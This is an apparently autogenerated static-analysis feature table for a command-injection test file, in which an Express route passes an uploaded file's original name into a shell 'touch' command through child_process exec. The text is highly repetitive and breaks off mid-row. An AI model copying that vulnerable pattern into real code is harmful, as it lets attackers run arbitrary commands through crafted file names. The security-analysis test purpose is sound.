fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:11 | express | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:32 | express | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:5:1:32 | express ... press') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:21 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | exceptional return of require('express') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | require('express') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:23:1:31 | 'express' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:23:1:31 | 'express' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:10 | multer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:10 | multer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:10 | multer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:31 | multer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:31 | multer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:31 | multer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:31 | multer ... ulter') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:31 | multer ... ulter') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:5:2:31 | multer ... ulter') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:21 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:21 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | exceptional return of require('multer') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | exceptional return of require('multer') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | exceptional return of require('multer') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | require('multer') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | require('multer') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | require('multer') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:23:2:30 | 'multer' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:23:2:30 | 'multer' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:23:2:30 | 'multer' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:23:2:30 | 'multer' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:23:2:30 | 'multer' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:23:2:30 | 'multer' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:10 | upload | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:10 | upload | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:10 | upload | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:41 | upload | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:41 | upload | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:41 | upload | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:41 | upload ... ds/' }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:41 | upload ... ds/' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:5:3:41 | upload ... ds/' }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:19 | multer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:19 | multer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:19 | multer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | exceptional return of multer( ... ds/' }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | exceptional return of multer( ... ds/' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | exceptional return of multer( ... ds/' }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | multer( ... ds/' }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | multer( ... ds/' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | multer( ... ds/' }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:21:3:40 | { dest: 'uploads/' } | CalleeFlexibleAccessPath | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:21:3:40 | { dest: 'uploads/' } | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:21:3:40 | { dest: 'uploads/' } | calleeImports | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:21:3:40 | { dest: 'uploads/' } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:21:3:40 | { dest: 'uploads/' } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:21:3:40 | { dest: 'uploads/' } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:26 | dest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:26 | dest | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:26 | dest | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:38 | dest: 'uploads/' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:38 | dest: 'uploads/' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:38 | dest: 'uploads/' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:38 | dest: 'uploads/' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:38 | dest: 'uploads/' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:23:3:38 | dest: 'uploads/' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | CalleeFlexibleAccessPath | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | InputAccessPathFromCallee | 0.dest | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | assignedToPropName | dest | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | calleeImports | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:29:3:38 | 'uploads/' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:7 | app | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:7 | app | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:19 | app | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:19 | app | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:5:5:19 | app = express() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:17 | express | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:17 | express | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | exceptional return of express() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | express() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | express() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:8 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:8 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:40 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:40 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:40 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:40 | exec = ... ").exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:40 | exec = ... ").exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:5:6:40 | exec = ... ").exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:18 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:18 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | exceptional return of require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | exceptional return of require ... ocess") | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | require ... ocess") | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:40 | require ... ").exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:40 | require ... ").exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:40 | require ... ").exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:20:6:34 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:20:6:34 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:20:6:34 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:20:6:34 | "child_process" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:20:6:34 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:20:6:34 | "child_process" | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:37:6:40 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:37:6:40 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:37:6:40 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:8:3 | app | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:8:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:8:3 | app | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:8:8 | app.post | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:8:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:8:8 | app.post | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | app.pos ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | app.pos ... T OK\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | exceptional return of app.pos ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | exceptional return of app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | exceptional return of app.pos ... T OK\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:5:8:8 | post | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:5:8:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:5:8:8 | post | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:10:8:19 | '/profile' | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:27 | upload | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:27 | upload | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:27 | upload | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:34 | upload.single | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:34 | upload.single | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:34 | upload.single | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | exceptional return of upload. ... vatar') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | exceptional return of upload. ... vatar') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | exceptional return of upload. ... vatar') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:29:8:34 | single | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:29:8:34 | single | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:29:8:34 | single | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | CalleeFlexibleAccessPath | upload.single | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | calleeImports | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:36:8:43 | 'avatar' | receiverName | upload | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | exec | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | this | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:8:46 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | 'arguments' object of anonymous function | fileImports | busboy child_process 